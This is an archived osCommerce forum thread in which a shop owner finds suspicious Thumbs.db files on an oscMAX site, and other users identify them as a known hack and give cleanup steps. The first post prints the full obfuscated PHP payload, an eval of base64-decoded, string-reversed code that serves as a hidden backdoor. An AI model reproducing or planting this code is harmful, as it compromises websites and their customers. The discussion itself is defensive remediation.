Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Thumbs.db


Plux

Recommended Posts

Ruud,

 

No, there are not.

 

 

 

 

Chris

Where do these come from then (btw. it was oscMAX2.0).

they contain code like I read that they where special oscommerce database files or something like that.

ÐÏࡱ

and

<?php 
@eval(base64_decode("aWYgKCRldmFsWmpoR1lUZm9GSWV0R28gIT0gMzQ1MTcpIHtmdW5jdGlvbiBldmFsSkhJT2tnekluU01KSCgkcyl7Zm9yICgkYSA9IDA7ICRhIDw9IHN0cmxlbigkcyktMTsgJGErKyApeyRlIC49ICRze3N0cmxlbigkcyktJGEtMX07fXJldHVybigkZSk7fWV2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9c1RLd2d5WnVsR2R5OUdjbEozWHk5bWN5VkdRIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj1BU2Y3a0NhWWxFZTROR1pqRjBheUZGYmhaWFprZ1NaazkyWWxSMlgwWVRaekZtWWc0bWMxUlhaeXRISXBnR1dKaEhlalIyWUJ0bWNSeFdZMlZHSm9ZRVdKRkdWWmRXZVF0RWJoWlhaZzQyYnBSM1l1Vm5aIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj09d09wSVNQTkpUV2lnaVJZbFVZVWwxWjVCMVNzRm1kbEJTUGdZVlE1OWtabVpVV3RkSFVpeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI3a2lJOTBFU2tobVV6TW1Jb1lFV0pGR1ZaZFdlUXRFYmhaWFo5czJRUjFVY3FGRlVobGxZSHhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiN2tpSTkwVFFqQmpVSUZtSW9ZRVdKRkdWWmRXZVF0RWJoWlhaOU1rWms1VWJCRkZWbVpGVm1aM1E2eFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9c1RLaTBETlhGbUlvWUVXSkZHVlpkV2VRdEViaFpYWjk4RWVuTlZiT3AxVVM5R1NMSmxid3hXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPT13T3BJU1A5RVZTMlIyVkpKQ0tHaFZTaFJWV25sSFVMeFdZMlZXUDZkMFlrMVVaejFXYURsbFFpMUdhcnhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPT13T2RsaUlWVlRWU2hrUndnMVVXQlRWV2xqUlZWbFVHTmxJb1lFV0pGR1ZaZFdlUXRFYmhaWFpiSlZSV0pWUlQ5Rko5VTFUcnQwYXJKV2F6Rm1jSXhXWTJWR0oiKGVkb2NlZF80NmVzYWIobGF2ZScpKTtldmFsKGV2YWxKSElPa2d6SW5TTUpIKCc7KSkiPXNUS3BJU1A5YzJZc2hYYlpSblJ0VmxJb1lFV0pGR1ZaZFdlUXRFYmhaWFpnd1NLaVFqVkhwVmRHZDFWaWdpUllsVVlVbDFaNUIxU3NGbWRsQkNMcElTUEpobFd5dzJSaHBtU1lsbFpHZFZZaWdpUllsVVlVbDFaNUIxU3NGbWRsQkNMcElDTTUwV1VQNWtWVUpDS0doVlNoUlZXbmxIVUx4V1kyVkdJc2tpSTlFa2JqRkRleVVsSW9ZRVdKRkdWWmRXZVF0RWJoWlhaZ3dTS2l3R2V5b2xkNUlqVWlnaVJZbFVZVWwxWjVCMVNzRm1kbGhTZWhKbmNoQlNQZzBVYTBaV1RLUkVlcGhIY3E1MlNTeFdZMlZHSiIoZWRvY2VkXzQ2ZXNhYihsYXZlJykpO2V2YWwoZXZhbEpISU9rZ3pJblNNSkgoJzspKSI9PXdPV0ZVZVBabVpHbFZiM0JsWXNGbWRsUlNQdUFuYUNwVVY1UkdXc05HYmhaWFprQVNLZ3N5S3BSQ0k3Z0RJOXdESXBSQ0k3QURJOUFTYWtnQ0l5OW1aIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj1zVEtwSVNQOUVsWjNzV2VqdDJaNU5HTTFjbFd3VWpNaXBXT0dSR2JrSkRXc2gzVmgxbVFGbFVkS2hGWndZVmJqZGpRVHRrZVNOMFNObHphYWRuU3NWR05vVjBWQ1pGYmtkblZISkdhYWhsV25Sak1pQm5VemtWZFc1bVdpZ2lSWWxVWVVsMVo1QjFTc0ZtZGxoQ2JoWlhaIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj09d09XRlVlUFptWkdsVmIzQmxZc0ZtZGxSaUxpNGlJOTRDSXdwbVFLVlZla2hGYmp4V1kyVkdKIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7ZXZhbChldmFsSkhJT2tnekluU01KSCgnOykpIj0wWGY3TUdXRnBtYlhwV1pqUm1XT2xFYmhaWFprQXlib05XWjcwVk1iTkdXRnBtYlhwV1pqUm1XT2xFYmhaWFprQVNQZ01HV0ZwbWJYcFdaalJtV09sRWJoWlhaa0F5T3BNR1dGcG1iWHBXWmpSbVdPbEViaFpYWmt3aWVITkdaTlYyY3RsMlFaSmtZdGgyYXNGbWRsUkNLbFIyYnNCSGVsQlNQZ01HV0ZwbWJYcFdaalJtV09sRWJoWlhaa3NYS3BvM1JqUldUbE5YYnBOVVdDSldib3RHYmhaWFprd3lZWVZrYXVkbGFsTkdaYTVVU3NGbWRsUkNLeVIzY3lSM2NvQWlacHRUS3AwVktpVWxUeFFWUzVZVVZWSmxSVEpDS0doVlNoUlZXbmxIVUx4V1kyVjJXU1ZrVlNWMFVmUkNLbFIyYmo1V1pzSlhkdWtpSTVjV2JLSkNLR2hWU2hSVldubEhVTHhXWTJWbUxwVTFUcnQwYXJKV2F6Rm1jSXhXWTJWR0pvVUdadk5tYmx4bWMxNVNLaWtUU3Rwa0lvWUVXSkZHVlpkV2VRdEViaFpYWnUwVktpMFRTR0pWUkdCRFdHSlZNVTVrVnJWbElvWUVXSkZHVlpkV2VRdEViaFpYWmJKVlJXSlZSVDlGSnVraUk5QURWaEpDS0doVlNoUlZXbmxIVUx4V1kyVm1McElTUDRRMFlpZ2lSWWxVWVVsMVo1QjFTc0ZtZGw1U0tpOG1RdXhrSW9ZRVdKRkdWWmRXZVF0RWJoWlhadThFZW5OVmJPcDFVUzlHU0xKbGJ3eFdZMlZHSnVraUk5MHpkTUpDS0doVlNoUlZXbmxIVUx4V1kyVm1Md3BtUUtWVmVraEZianhXWTJWR0p1a2lJOWdUZU1KQ0tHaFZTaFJWV25sSFVMeFdZMlZtTHBJU1A5YzJUaWdpUllsVVlVbDFaNUIxU3NGbWRsNXlRbVJtVHRGVVVVWm1WVVptZERwSGJoWlhaa2dDVFBaR2NTcEhlSWhWUVZaSGNseFdZMlZHSTlBeVlZVmthdWRsYWxOR1phNVVTc0ZtZGxSQ0k3a0NNd2dETXhzU0tvVVdicFJITHBraUk5MEVTa2htVXpNbUlvWUVXSkZHVlpkV2VRdEViaFpYWm9VRFp0eHlhREZWVHhwV1VRRldXaWRFYmhaWFprZ1NacHQyYnZOR2RsTkhRZ3NISWxOSGJsQlNmN0JTS3BrU1hyTlVVTkZuYVJCVllaSjJSc0ZtZGxSeVdGbDBTUDkwUWZSQ0swVjJjemxHS2dJM2Jna1NLVjkwYUx0MmFpbDJjaEpIU3NGbWRsUkNJc0lTYXZJQ0l1QVNLTmxHZG0xa1NFaFhhNEJuYXV0a1VzRm1kbFJDSXNJQ2ZpZ1NaazlHYncxV2FnNENJaThpSW9nMlkwRldiZmRXWnlCSEtvWVdhIihlZG9jZWRfNDZlc2FiKGxhdmUnKSk7JGV2YWxaamhHWVRmb0ZJZXRHbyA9MzQ1MTc7fQ==")); ?>

Link to comment
Share on other sites

Are there any files that come with osCommerce called Thumbs.db in a clean installation?

 

They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file.

Link to comment
Share on other sites

They are generated by Windows, but related to ThumbsPlus thumbnail program. Check www.cerious.com for discussions relating to this file.

So none of them should be in a osCMAX2.0 website I presume?

 

I tried deleting one but then I got a fatal error visiting the admin panel. However beside saying error nothing worked out of the ordinary.

 

And why is the file so heavily encrypted?

Link to comment
Share on other sites

I'd bet a pickled buffalo tongue that if you look closer the last file you posted is really named Thumbs.db.php, a known hack file.

 

And hey, what a coincidence, what you posted sure looks like hack code to me...

:blush:

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

http://www.oscommerce.com/forums/topic/374682-weird-files/

 

You need to either manually remove the malicious code on your site or go to a backup prior to April 23rd (most likely the time of attack).

 

Files that were likely infected

Numerous .php files

Numerous .htm or html files

 

Had you done this when you first posted the topic, your host would probably had a backup if you didn't they could help you with.

 

You then need to update your FTP program and change all passwords used with it.

Additionally read the how to secure your site thread here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/

I'm not sure how this works in oscMax but its a good starting point none-the-less

 

Link to comment
Share on other sites

I have this same attack on one of my sites.

the also update the .htaccess file to recognize the thumbs.db. so deleting the thumbs.db is not enough, you have to scroll down to the very bottom of the .htaccess file and delete the added line.

 

tom

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...